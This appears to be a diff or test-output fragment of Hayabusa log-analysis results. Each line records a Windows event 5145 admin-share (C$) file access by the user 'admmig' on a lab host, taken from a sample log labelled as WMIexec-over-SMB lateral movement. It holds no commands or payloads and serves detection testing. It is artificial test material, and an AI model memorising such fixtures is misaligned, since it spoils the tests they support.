+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn\14b968adbdb2082b1b938b20b5cb24b5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#\10dd4c410de361a8ee03b5b7c662ccc9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\7845e0cf7da2edf653fbcc126cda2f48 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#\9db094774e9db914aedfcad797c955d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\c8152fae930d6b5e4dd5323561626549 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\c5bf2f5c3e13726b3984a900221e1778 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Core | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c1194e56644c7688e7eb0f68a57dcc30 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8a7f63a63249ceccb5c51a9a372aaf64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity\9332198f4736c780facfd62fead6fa26 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq\afe9ad217242ffe7adeeebf7417a0e56 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services\ee663803638dd6a1e68078d00330c716 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml\a686774445eff8eba0a781106f24b040 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#\6255822d609f7753b8b77a030c397503 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#\730ce0d11e99c329a9ab7bd75787f1bf | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#\3d5b722235db7e8a8c7d1344c7221c33 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#\003de8140f5201b90706bed8c0b34d9a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#\8b98eff35de01ce97f419f50f85f6123 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment\53494598e1b6d05a1c7e3020cc4e9106 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Design | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Design\52a567b78cdfcd6f0926ba88bd575776 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Device | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Device\7270490235668fa0578aec716a28ce87 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#\54c0c8fb72275b54709f09380c489b31 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#\8f83846bacd706e939a5ed0f8b5e3a25 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\8f81b927dcc93ba9ce82d9b8a45d3ee6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#\37cc106c66bc77ec23840bde30a2b4ad | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ddb52221ad0200b7c2e0a308e47d5c7c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\93aa8a60d293a05752aca14646afe6d2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\65b4d38e24dfdd935b19ba1de243c244 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
